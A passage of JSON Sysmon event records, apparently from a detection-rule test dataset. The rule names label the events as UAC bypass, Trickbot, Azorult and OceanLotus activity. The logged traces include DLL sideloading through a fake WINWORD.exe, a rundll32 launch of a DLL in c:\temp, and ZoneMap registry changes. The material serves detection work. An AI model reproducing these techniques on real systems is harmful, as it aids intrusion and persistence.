(0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424249,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.931290Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424250,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.931385Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424251,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.931451Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424260,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:22.063160Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424262,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:22.074619Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.360"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424320,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:22.361291Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-23 21:35:19.617","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FE-5F93-0000-0010DC535E00","ProcessId":8920,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\data.enc","UtcTime":"2020-10-23 21:58:22.360"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424322,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:22.364651Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-23 21:35:19.617","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FE-5F93-0000-0010DC535E00","ProcessId":8920,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\config.xml","UtcTime":"2020-10-23 21:58:22.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424323,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:22.391794Z"}},"Version":2}}}},{"detection":["Trickbot Malware Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\wermgr.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Problem Reporting","FileVersion":"10.0.17763.1369 (WinBuild.160101.0800)","Hashes":"SHA1=231052FA4311FA3501539E34E21A624921E3C270,MD5=CD042F94B63D67E012CFB4297D313248,SHA256=61A84B2D8CA05C11E79DB8E18FEB0FE4BE1B8D555D0BE2651516B144800153AB,IMPHASH=4E00FCA0721761B10A8A7351CEFB0596","Image":"C:\\Windows\\System32\\wermgr.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6311-5F8F-0000-0020E0100900","LogonId":"0x910e0","OriginalFileName":"WerMgr","ParentCommandLine":"rundll32.exe c:\\temp\\winfire.dll,DllRegisterServer","ParentImage":"C:\\Windows\\SysWOW64\\rundll32.exe","ParentProcessGuid":"747F3D96-659B-5F8F-0000-001026C33300","ParentProcessId":2372,"ProcessGuid":"747F3D96-659E-5F8F-0000-001064E03300","ProcessId":5600,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-20 22:33:02.059"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":422695,"Execution":{"#attributes":{"ProcessID":3408,"ThreadID":4448}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-20T22:33:02.063979Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\Public\\tools\\apt\\wwlib\\","Description":"Microsoft Office Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020100A0A00","LogonId":"0xa0a10","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-CA8F-5F8A-0000-001025020B00","ParentProcessId":5104,"ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:27.491"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417068,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:27.499490Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:27.769"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417069,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4704}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:28.429353Z"}},"Version":3}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:27.769"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417070,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4704}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:28.429717Z"}},"Version":3}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Office Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Windows\\SysWOW64\\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}","ParentImage":"C:\\Windows\\SysWOW64\\dllhost.exe","ParentProcessGuid":"747F3D96-D8E2-5F8A-0000-0010F28A7200","ParentProcessId":8500,"ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:31.478"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417071,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:31.484036Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:31.615"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417072,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:31.627786Z"}},"Version":3}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:31.615"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417073,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:31.628328Z"}},"Version":3}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-17 10:48:12.936","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","UtcTime":"2020-10-17 11:43:33.444"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":417074,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:33.449476Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-17 10:48:12.936","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\wwlib.dll","UtcTime":"2020-10-17 11:43:33.444"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":417075,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:33.476471Z"}},"Version":2}}}},{"detection":["MS Office Product Spawning Exe in User Dir","Microsoft Office Product Spawning Windows Shell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8E8-5F8A-0000-00102CEF7200","ProcessId":840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:36.303"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417079,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:36.306601Z"}},"Version":5}}}},{"detection":["MS Office Product Spawning Exe in User Dir"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\explorer.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows Explorer","FileVersion":"10.0.17763.1369 (WinBuild.160101.0800)","Hashes":"SHA1=60E3F357B06AF9EB84FB9019BF08FB4DD109D4EC,MD5=AA0CA518E66F290FE0BAC6169473E8A9,SHA256=0D7CB0B75CD61CDFFE0E53910829FFA5C02C8759EBD27A49E2EF7A907A10E506,IMPHASH=FBEBD61CE702929C1F33B522FD572C5D","Image":"C:\\Windows\\SysWOW64\\explorer.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"EXPLORER.EXE","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8EC-5F8A-0000-001094207300","ProcessId":6552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:40.835"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417081,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:40.902894Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","MS Office Product Spawning Exe in User Dir"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Microsoft Office Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8F1-5F8A-0000-00108B4B7300","ProcessId":1576,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 